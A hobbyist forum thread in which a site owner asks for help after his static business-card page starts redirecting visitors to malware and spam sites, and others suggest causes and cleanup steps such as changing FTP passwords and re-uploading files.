My personal site hacked - please help!!!

[Gryzor]

Hello guys,

I was wondering if you could help me shed some light...

I am using www.gryzor.info as a personal online business card. Yesterday I was alerted by a contact of mine that his antivirus blocked my page.

I check it through online security sites, homepage seems clean. I visit it - clean. Then I hit the email icon - and Chrome/Opera give me warnings about malware being served and whatnot, and when I click "continue" it starts autoforwarding to several sites one after the other...

So I check the code - absolutely clean. There's really nothing in there, just a link to a png, and a Google Analytics snippet.

Now, get this - the png does not appear, even though it *is* on the correct path. Once I've called it manually it appears...

What's even weirder is that it seems it's random - for instance, I just visited the page from my work computer, the png did not appear but no warnings appeared, either (though this might be the corporate proxy kicking in and protecting me).

Can someone please try it and let me know? This is pretty bad for a business card...

Thanks - just don't use IE

[Bryce]

Hi Gryzor,
      I just gave it a go with XP + Firefox + Trend Micro. Trend Micro blocked it because the email button tries to forward the user to "http://pills.ind.in/in.cgi?4" which isn't good. Definitely hacked, try uploading the original htmls again and then beat up your provider for not having a decent security system. And take that Google analytics stuff out, maybe the hack is there?

Bryce.

[Gryzor]

Hello mate,

Indeed that's the original one - at home it kept redirecting me to different servers...

This is the underlying code:

Code Select Expand


<html>

<head>

</head>

<body>

<table width="100%" height="100%">

<tr>

<td style="vertical-align:middle">

<center><img src="email.png" border="0"></img></center>

</td>

</tr>

</table>





<script type="text/javascript">

var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");

document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));

</script>

<script type="text/javascript">

try {

var pageTracker = _gat._getTracker("UA-109515-1");

pageTracker._trackPageview();

} catch(err) {}</script>

</body>

</html>

Looks ok, damn it!

According to Google, the code is

Code Select Expand


<script type="text/javascript">
  var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
  document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
  </script>
  <script type="text/javascript">
  try{
  var pageTracker = _gat._getTracker("UA-xxxxxx-x");
  pageTracker._trackPageview();
  } catch(err) {}
  </script>

But, the only thing I can think of is if someone hacked the server alright and changed the files. But how come it doesn't always come up malicious???

[EDIT] Can you copy/paste the source code you loaded here?

[Devilmarkus]

Of course your website is bad.... It still links to cpcwiki.com.
Thats why all browsers block it

[Gryzor]

Yeah, I know It's because I uploaded the wrong files when I changed servers...

Did you see the bad stuff by any chance? Do you have the code?

[arnoldemu]

Yeah, I know It's because I uploaded the wrong files when I changed servers...

Did you see the bad stuff by any chance? Do you have the code?

I do it says

Code Select Expand


<html>
<head><title>PCW rules</title></head>
<body>
<b>PCW rules!</b> http://www.pcw-rules.com
</body>


or...?

[Gryzor]

Har, har, har

[Bryce]

Have you tried renaming the file email.html and its link on the main page to something else? and also add the full path to href (ie: www.gryzor...email.html) ? Could it be a hacked DNS ?

Bryce. 

[Gryzor]

You mean someone would hack the dns server and arbitrarily redirect certain links to point to someplace else?

It doesn't smell like this... because I guess dns servers deal with the server names themselves, not individual paths and files. So it couldn't be able to redirect a certain file/link and not the whole domain (gryzor.info)...

[Bryce]

No, not exactly. What I meant was : Because all other links (which are all external) on the page work properly, there might be a problem with internal links on the server being sent somewhere dodgy. By adding the full path, you might get the server to ask a DNS server to locate the page, rather than using the internal workings of the server that your page is on?

ie: Server says: oh look, www.cpcwiki.org => Go to DNS to find this.
                          but for  \email.html => use internal process that has been hacked to go to something dodgy.

I still think it's something on the providers side that's been hacked and not your page.

Bryce.

[Gryzor]

Ahhhh I see what you mean, good point there. But indeed, I will contact the host... thanks for your advice!

[ivarf]

Not what I know most about, but I guess the setup of what DNS you use is located in your account on the server. That file can point to the DNS of your choice (or the page the hacker or script chooses)

[Xyphoe]

Hi mate

I deal with hacked sites all day long, tis my job

Give us a shout if you want me to take a look ... quick reply from me now as I need to shoot off...

But -

Is your hosting server Linux or Windows? If the former do you have SSH access?
Do you have access to er 'access logs' and FTP logs?

Sorry, it's unusual to find it's the host's fault unless they're really terrible. If their server (I take it you're on shared or VPS hosting platform given your servers IP resolve to a Plesk page....?) really has been cracked then hackers would be doing far more useful and naughty things with it than bothering with one of your pages.

Do you have any scripting on your site? PHP, etc?
Any includes to files held remotely on a different server?

Also it's becoming more common that FTP credentials are being stolen from the client machine due to them having a virus on their PC.

First thing I would do now is change FTP and any other account passwords and initiate a full up-to-date virus scan of your PC, and any other PC that has been used to connect via FTP to the account. Just to be sure.

[Gryzor]

Is it really your job? So you are a..... HACKER?

-SUSE, no root/SSH access
-Access log doesn't show much... I think it gets pruned very soon anyway
-Yes, shared hosting and PLESK (it's a business card )
-No, no scripting whatsoever. There are a few files from the old gryzor.info with CPC and ST stuff, but they're not linked to and as far as I remember they're pure HTML
-Absolutely no includes, I didn't know about that stuff back then!
-I can change the password, but on the other hand it's only been a month or so that I moved to this host and I did change the default pwd....

If you think you can help, or even if you're just a bit weird, I can give you the credentials to log on and take a look...

And thanks for your trouble

[andycadley]

From your description, I'd suspect someone has rooted the server (or one of them) possibly via one of the other sites under shared hosting. In any case, I'd contact your hosting provider and get them to investigate at this point.

[TFM]

Is it really your job? So you are a..... HACKER?

Didn't you know it... he's the masked Hacker!!! (Didn't you finish OP, everything will be revealed at the end)

[Xyphoe]

Is it really your job? So you are a..... HACKER?

hehehehehe - no!

Hence me saying 'dealing with' for all my sins. *sigh*
Last night I had a very annoyed dedicated server customer blaming us for his hacked server when his root password was "pa55w0rd" ... dumbass!

But anyway...

-SUSE, no root/SSH access
-Access log doesn't show much... I think it gets pruned very soon anyway
-Yes, shared hosting and PLESK (it's a business card )
-No, no scripting whatsoever. There are a few files from the old gryzor.info with CPC and ST stuff, but they're not linked to and as far as I remember they're pure HTML
-Absolutely no includes, I didn't know about that stuff back then!
-I can change the password, but on the other hand it's only been a month or so that I moved to this host and I did change the default pwd....

If you think you can help, or even if you're just a bit weird, I can give you the credentials to log on and take a look...

And thanks for your trouble

To be honest without FTP, SSH and access logs stretching back before the hack occured it would be pointless me looking, I mean if they're just static HTML pages - no scripting no includes etc - then the only possible way is with stolen FTP credentials (you sure you don't have any trojans lurking about on your PCs?) or worse the servers been rootkit'd.

Looking at the access logs you do have would be pointless, what I'd be looking for in there is remote file includes and code injections to scripts - but then you don't have any.

Personally I would flatten the hosting space (ie delete everything), change the FTP passwords and re-upload your site - then go ask your hosting company to find out how it occurred from the logs that will be on the server but that we don't have access to.

If you don't want to faff about, given its a small site I'll give you some free hosting space on my own servers if you want.

[Devilmarkus]

For what should this piece of code be good for?

Code Select Expand


<script type="text/javascript">

var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");

document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));

</script>

<script type="text/javascript">

try {

var pageTracker = _gat._getTracker("UA-109515-1");

pageTracker._trackPageview();


} catch(err) {}</script>

[Gryzor]

@Xyphoe: thanks for your input. I'll first contact the host and then perform the suggested actions (and, no, I don't believe I've got a trojan dammit...). About your offer - thanks, I appreciate it very much But it's a very cheap host anyhow, I wouldn't wanna bother you Thanks again!

@Markus: the "catch{err}" goes together with the "try" function. What happens is that whatever is in the "try" function runs as normal, but if there's any error the script is redirected to catch(err). Since catch(err) is empty ({}), nothing happens. In effect, IIRC, this prevents any error messages from GA's server from being displayed on your page...

[Xyphoe]

Hi mate,

No probs!

After my last post I realised there was the Google Analytics code, so I got suspicious.

Interesting article here I found - http://www.google.com/support/forum/p/Google%20Analytics/thread?tid=1f6452112c01bb78

Certainly at least your hosts FTP logs will be revealing.
With a very simple grep on the command line of the FTP logs they'll be able to tell you which IP addresses has been connecting via FTP, you can then check which IP's aren't yours (your ISPs) in the RIPE/AFNIC/etc databases.

[Gryzor]

Ah darn, your link autoforwards to the forum's landing page...

[Xyphoe]

Ah darn, your link autoforwards to the forum's landing page...

It does? I've just clicked it and works fine for me? Try copying and pasting into your browser address bar.

[Gryzor]

I already did, and it does the same... not much sense in it. Can you copy/paste here?